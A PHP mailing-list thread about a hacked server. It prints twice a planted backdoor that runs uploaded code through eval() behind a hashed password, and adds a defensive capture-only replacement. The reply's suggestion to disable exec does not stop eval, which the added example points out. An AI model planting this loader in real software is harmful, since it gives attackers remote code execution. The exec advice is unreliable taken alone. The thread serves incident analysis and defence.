Re: Hack question

Al wrote:
I'm still fighting my hack problem on one of my servers. Can anyone help me figure out what's the purpose of this code? The hack places this file in numerous dirs on the site, I assume using a php script because the owner is "nobody".

I can sort of figure out what it is doing, but I can't figure out what the hacker is using it for.

Incidentally, I've changed all passwords and restricted ftp to two people. I see no sign that any code is written by the site owner, i.e., ftp. And, I've looked carefully for suspect php files.

<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?>

<?php error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t)
{
    echo "$t\n";
} ;
function testdata($t)
{
    say(md5("testdata_$t"));
} ;
echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3")
{
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"]))
    {
        eval($code);
    }     else
    {
        testdata('f');
    } ;
} else
{
    testdata('pass');
} ;
testdata('end');
echo "</pre>";
?>


My first suggestion is to disable the use of exec in the disable_functions entry in your php.ini file. I would not allow the call to exec to be completed.

So, something like this should work for now.

disable_functions = exec

Also, you could modify the file that is being run to actually capture the uploaded file contents. Change out the exec part and have it log it to a file somewhere. Then you can see what they are actually trying to do.

--
Jim Lucas

   "Some men are born to greatness, some achieve greatness,
       and some have greatness thrust upon them."

Twelfth Night, Act II, Scene V
    by William Shakespeare


--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
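
The second suggestion in the reply above, capturing the upload instead of running it, could look like the following. This is an added example, not code from the thread; it uses `$_FILES` in place of the sample's `$HTTP_POST_FILES`, and `LOG_DIR`, `MAX_BYTES`, `KNOWN_HASH` and `capture_request` are hypothetical names chosen here.

```php
<?php
// Added example: capture-only stand-in for the dropped file. Nothing uploaded is executed.
// Assumption: LOG_DIR is a hypothetical path outside the web root, writable only by
// the web server user and never served over HTTP.
const LOG_DIR    = '/var/log/php-capture';
const MAX_BYTES  = 1048576;                             // store at most 1 MiB per upload
const KNOWN_HASH = 'aace99428c50dbe965acc93f3f275cd3';  // md5 the sample compares "p" against

function capture_request(array $server, array $post, array $files, string $dir): array
{
    $id = gmdate('Ymd\THis\Z') . '-' . bin2hex(random_bytes(4));
    $p  = isset($post['p']) && is_string($post['p']) ? $post['p'] : '';
    $record = [
        'id'         => $id,
        'remote'     => $server['REMOTE_ADDR'] ?? '',
        'method'     => $server['REQUEST_METHOD'] ?? '',
        'uri'        => $server['REQUEST_URI'] ?? '',
        'user_agent' => $server['HTTP_USER_AGENT'] ?? '',
        'script'     => $server['SCRIPT_FILENAME'] ?? '',  // which copy of the file was hit
        'p'          => $p,
        'p_matches'  => hash_equals(KNOWN_HASH, md5($p)),
        'payload'    => null,
    ];

    // The sample reads the upload field "f"; keep its bytes as inert data.
    $tmp = $files['f']['tmp_name'] ?? '';
    if (is_string($tmp) && $tmp !== '' && is_uploaded_file($tmp)) {
        $bytes = (string) file_get_contents($tmp, false, null, 0, MAX_BYTES);
        $path  = "$dir/$id.payload.txt";                   // never a .php name
        file_put_contents($path, $bytes, LOCK_EX);
        chmod($path, 0600);
        $record['payload'] = [
            'file'   => $path,
            'size'   => $files['f']['size'] ?? strlen($bytes),
            'sha256' => hash('sha256', $bytes),
        ];
    }

    // One JSON object per line, so the log can be grepped or forwarded.
    $line = json_encode($record, JSON_INVALID_UTF8_SUBSTITUTE | JSON_UNESCAPED_SLASHES);
    file_put_contents("$dir/requests.jsonl", $line . "\n", FILE_APPEND | LOCK_EX);
    return $record;
}

capture_request($_SERVER, $_POST, $_FILES, LOG_DIR);
http_response_code(404);                                   // reveal nothing to the caller
```

The sample runs the upload through `eval()`, which is a language construct rather than a function, so a `disable_functions` entry does not block it; removing that call, as this stand-in does, is what stops execution.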

